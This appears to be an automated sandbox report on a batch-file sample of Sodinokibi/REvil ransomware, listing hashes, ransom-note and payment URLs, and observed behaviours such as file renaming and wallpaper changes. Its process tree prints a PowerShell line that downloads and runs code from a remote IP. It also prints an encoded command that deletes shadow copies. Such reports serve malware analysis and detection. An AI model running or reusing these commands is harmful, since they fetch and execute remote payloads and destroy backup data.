Analysis
-
max time kernel
85s -
max time network
88s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
12-08-2020 07:10
Static task
static1
Behavioral task
behavioral1
Sample
16158bc1db4ba8fb8e9a13c34c8a51e1.bat
Resource
win7
Behavioral task
behavioral2
Sample
16158bc1db4ba8fb8e9a13c34c8a51e1.bat
Resource
win10v200722
General
-
Target
16158bc1db4ba8fb8e9a13c34c8a51e1.bat
-
Size
216B
-
MD5
bf75953509fd375616976c6eb6f30aff
-
SHA1
3bf54cce4abd3c3434b7073e4ebe0f480295923c
-
SHA256
5edd7915fd9b57f2643fe8abf646344fccd2efc98d4dcbeab47659b14f59feb4
-
SHA512
8362b4f7c808e754bb468b31140b3ec023527e468ec8a9171111f77e39c55a8b04cc3442bc4c334a3cce25e90b9ce5cd14842d7cbd66fef8d6051d02f8e953f9
Malware Config
Extracted
http://185.103.242.78/pastes/16158bc1db4ba8fb8e9a13c34c8a51e1
Extracted
C:\4v057e0-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/71D027CBC5483D95
http://decryptor.cc/71D027CBC5483D95
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 3880 powershell.exe -
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\ConvertFromClose.tiff powershell.exe File opened for modification \??\c:\users\admin\pictures\MergeRedo.tiff powershell.exe File renamed C:\Users\Admin\Pictures\ConvertFromClose.tiff => \??\c:\users\admin\pictures\ConvertFromClose.tiff.4v057e0 powershell.exe File renamed C:\Users\Admin\Pictures\RegisterConvertFrom.png => \??\c:\users\admin\pictures\RegisterConvertFrom.png.4v057e0 powershell.exe File renamed C:\Users\Admin\Pictures\StartEnter.png => \??\c:\users\admin\pictures\StartEnter.png.4v057e0 powershell.exe File renamed C:\Users\Admin\Pictures\MergeRedo.tiff => \??\c:\users\admin\pictures\MergeRedo.tiff.4v057e0 powershell.exe File renamed C:\Users\Admin\Pictures\BackupUnregister.crw => \??\c:\users\admin\pictures\BackupUnregister.crw.4v057e0 powershell.exe File renamed C:\Users\Admin\Pictures\SaveSubmit.png => \??\c:\users\admin\pictures\SaveSubmit.png.4v057e0 powershell.exe File renamed C:\Users\Admin\Pictures\SearchPop.crw => \??\c:\users\admin\pictures\SearchPop.crw.4v057e0 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\535qwwk.bmp" powershell.exe -
Drops file in Program Files directory 34 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\ConvertToUse.ini powershell.exe File opened for modification \??\c:\program files\SaveSwitch.mht powershell.exe File opened for modification \??\c:\program files\UnblockPop.jpe powershell.exe File opened for modification \??\c:\program files\UseEnable.7z powershell.exe File opened for modification \??\c:\program files\SubmitEdit.pptx powershell.exe File created \??\c:\program files\4v057e0-readme.txt powershell.exe File opened for modification \??\c:\program files\GrantPush.fon powershell.exe File opened for modification \??\c:\program files\MergeInitialize.xml powershell.exe File opened for modification \??\c:\program files\ProtectPublish.rm powershell.exe File opened for modification \??\c:\program files\GroupOptimize.dwg powershell.exe File opened for modification \??\c:\program files\NewRemove.mp2v powershell.exe File opened for modification \??\c:\program files\RestartGrant.m4a powershell.exe File opened for modification \??\c:\program files\RestartPing.mht powershell.exe File opened for modification \??\c:\program files\ImportAdd.i64 powershell.exe File opened for modification \??\c:\program files\LockOpen.pps powershell.exe File opened for modification \??\c:\program files\WaitGrant.wm powershell.exe File opened for modification \??\c:\program files\RestartSearch.mht powershell.exe File created \??\c:\program files (x86)\4v057e0-readme.txt powershell.exe File opened for modification \??\c:\program files\ClearRedo.mpeg3 powershell.exe File opened for modification \??\c:\program files\MeasureRead.mpeg powershell.exe File opened for modification \??\c:\program files\PopRedo.midi powershell.exe File opened for modification \??\c:\program files\SyncMeasure.ex_ powershell.exe File opened for modification \??\c:\program files\TraceClear.reg powershell.exe File opened for modification \??\c:\program files\TraceEnter.bmp powershell.exe File opened for modification \??\c:\program files\UndoExpand.ppt powershell.exe File opened for modification \??\c:\program files\AddSend.wvx powershell.exe File opened for modification \??\c:\program files\ExitSplit.vsdx powershell.exe File opened for modification \??\c:\program files\FindConvertTo.ADTS powershell.exe File opened for modification \??\c:\program files\ResetUse.mpeg powershell.exe File opened for modification \??\c:\program files\BackupUnlock.xml powershell.exe File opened for modification \??\c:\program files\LimitShow.ods powershell.exe File opened for modification \??\c:\program files\OptimizeRead.vst powershell.exe File opened for modification \??\c:\program files\SubmitOptimize.tif powershell.exe File opened for modification \??\c:\program files\EditMount.xsl powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepid process 3880 powershell.exe 3880 powershell.exe 3880 powershell.exe 3880 powershell.exe 3880 powershell.exe 3968 powershell.exe 3968 powershell.exe 3968 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 3880 powershell.exe Token: SeDebugPrivilege 3880 powershell.exe Token: SeDebugPrivilege 3968 powershell.exe Token: SeBackupPrivilege 352 vssvc.exe Token: SeRestorePrivilege 352 vssvc.exe Token: SeAuditPrivilege 352 vssvc.exe Token: SeTakeOwnershipPrivilege 3880 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 964 wrote to memory of 3880 964 cmd.exe powershell.exe PID 964 wrote to memory of 3880 964 cmd.exe powershell.exe PID 964 wrote to memory of 3880 964 cmd.exe powershell.exe PID 3880 wrote to memory of 3968 3880 powershell.exe powershell.exe PID 3880 wrote to memory of 3968 3880 powershell.exe powershell.exe PID 3880 wrote to memory of 3968 3880 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\16158bc1db4ba8fb8e9a13c34c8a51e1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/16158bc1db4ba8fb8e9a13c34c8a51e1');Invoke-ZOPUSYDNI;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3968
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:352